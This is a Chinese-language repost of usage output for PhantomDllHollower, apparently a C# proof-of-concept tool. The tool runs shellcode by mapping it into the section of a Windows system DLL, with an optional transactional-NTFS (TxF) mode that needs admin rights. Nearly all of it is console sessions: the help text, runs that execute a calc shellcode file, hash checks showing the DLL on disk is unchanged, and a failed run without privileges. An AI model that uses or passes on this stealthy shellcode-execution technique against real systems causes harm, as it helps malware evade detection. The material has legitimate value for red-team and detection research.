C:Tools>PhantomDllHollower.exePhantomDllHollower - Tool for testing Phantom DLL Hollowing.Usage: PhantomDllHollower.exe [Options]-h, --help : Displays this help message.-p, --payload : Specifies shellcode to execute.-t, --txf : Flag to use TxF. This option requires administrative privilege.[] -p option is required.
要使用此 PoC,请指定要执行的 shellcode 文件,如下所示:
C:Tools>powershell -c Get-Process calc*C:Tools>PhantomDllHollower.exe -p calc.bin[] Trying to read payload from C:Toolscalc.bin.[] Payload is read successfully (276 bytes).[>] Searching target module file from C:Windowssystem32.[+] Got target module path.[*] Target : C:Windowssystem32aadauthhelper.dll[>] Trying to create section object for payload.[+] Payload section object is created successfully.[*] Section Handle : 0x2CC[>] Trying to map payload section.[+] Payload Section is mapped at 0x00007FF86D2C0000.[>] Trying to write shellcode to payload section's entry point.[*] Entry Point @ 0x00007FF86D2C2900[+] Shellcode is written successfully.[>] Executing your shellcode.[+] Shellcode thread is created successfully.[*] Waiting for shellcode thread exit.[*] Done.C:Tools>powershell -c Get-Process calc*Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName------- ------ ----- ----- ------ -- -- -----------598 49 30140 74824 0.34 7760 1 CalculatorApp
如果你想使用 TxF 技术,设置-t标志以及 shellcode 文件路径。此选项需要管理权限:
C:Tools>certutil -hashfile C:WindowsSystem32concrt140.dll sha1SHA1 hash of C:WindowsSystem32concrt140.dll:2497d0e241c1adf74f03d7d6065e0e0dd365a9d9CertUtil: -hashfile command completed successfully.C:Tools>powershell -c Get-Process calc*C:Tools>whoami /groups | findstr /i levelMandatory LabelHigh Mandatory Level Label S-1-16-12288C:Tools>PhantomDllHollower.exe -p calc.bin -t[] Trying to read payload from C:Toolscalc.bin.[] Payload is read successfully (276 bytes).[>] Searching target module file from C:Windowssystem32.[*] TxF mode is enabled. This mode requires administrative privilege.[+] Got target module path.[*] Target : C:Windowssystem32concrt140.dll[>] Trying to generate payload data.[+] Payload data is generated successfully.[>] Trying to create section object for payload.[+] Payload section object is created successfully.[*] Section Handle : 0x318[>] Trying to map payload section.[+] Payload Section is mapped at 0x00007FF863F80000.[*] Shellcode @ 0x00007FF863FAD030[>] Executing your shellcode.[+] Shellcode thread is created successfully.[*] Waiting for shellcode thread exit.[*] Done.C:Tools>certutil -hashfile C:WindowsSystem32concrt140.dll sha1SHA1 hash of C:WindowsSystem32concrt140.dll:2497d0e241c1adf74f03d7d6065e0e0dd365a9d9CertUtil: -hashfile command completed successfully.C:Tools>powershell -c Get-Process calc*Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName------- ------ ----- ----- ------ -- -- -----------598 49 30136 55972 0.30 7504 1 CalculatorApp
如果在-t没有管理权限的情况下设置标志,则无法搜索目标 DLL,如下所示:
C:Tools>powershell -c Get-Process calc*C:Tools>whoami /groups | findstr /i levelMandatory LabelMedium Mandatory Level Label S-1-16-8192C:Tools>PhantomDllHollower.exe -p calc.bin -t[] Trying to read payload from C:Toolscalc.bin.[] Payload is read successfully (276 bytes).[>] Searching target module file from C:Windowssystem32.[*] TxF mode is enabled. This mode requires administrative privilege.[-] Failed to find abusable module. You may not have sufficient privileges.C:Tools>powershell -c Get-Process calc*
https://github.com/daem0nc0re/TangledWinExec/tree/main/PhantomDllHollower
原文始发于微信公众号(Khan安全攻防实验室):Phantom DLL Hollowing 的 CSharp 实现
